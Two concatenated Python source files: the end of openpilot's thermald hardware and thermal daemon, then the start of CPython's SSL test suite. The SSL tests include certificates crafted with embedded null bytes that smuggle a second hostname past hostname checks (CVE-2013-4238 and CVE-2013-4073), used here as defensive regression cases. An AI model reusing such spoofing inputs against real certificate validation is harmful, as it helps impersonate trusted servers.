ThermalStatus.danger: ThermalBand(94.0, None),
})
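# Worked example of the hysteresis this table gives: starting at ThermalStatus.green the
# status only moves up once the temperature exceeds 80.0; once yellow, it only drops back
# to green below 75.0, so the status does not oscillate around a single threshold.
# (This is a reading of the band table above; the band-update logic itself lives elsewhere in thermald.)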
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
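# For illustration: read_tz(5) reads /sys/devices/virtual/thermal/thermal_zone5/temp, while
# read_tz("some-zone-type") (a hypothetical type name) first resolves the zone index via the
# zones' "type" files. The raw sysfs value is returned (typically millidegrees Celsius), or 0
# if the zone is missing; read_thermal() below divides by the scale factors in thermal_config.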
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if AGNOS and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if AGNOS and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
      # Set up the fan controller on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
elif (sec_since_boot() - sm.rcv_time['pandaStates']) > DISCONNECT_TIMEOUT:
if onroad_conditions["ignition"]:
onroad_conditions["ignition"] = False
cloudlog.error("panda timed out onroad")
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
    # with less than 2% free space we block startup, otherwise the device will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
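# Design note: hw_state_thread does the slow hardware queries (network, modem, NVMe) on a
# 10s cadence and hands the latest snapshot to thermald_thread through a maxsize-1 queue,
# so the main control loop never blocks on them; if either thread exits, main() sets
# end_event and joins both.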
test_ssl.py
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
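# e.g. data_file("keycert.pem") resolves relative to this test's directory, and the *name
# form also builds nested paths such as data_file("capath", "4e1295a3.0").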
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
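# These version helpers compare 5-tuples of (major, minor, fix, patch, status);
# e.g. OpenSSL 1.0.2k reports (1, 0, 2, 11, 15), where patch 11 is the letter 'k'
# and status 15 (0xf) marks a release build.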
def utc_offset(): # NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
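# e.g. on that specific build asn1time("Oct 5 23:01:56 2020 GMT") would come back as
# "Oct  5 23:01:00 2020 GMT" (seconds zeroed, leading zero swapped for the space that
# ASN1_TIME_print() emits); on every other build the string is returned unchanged.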
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
        # are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
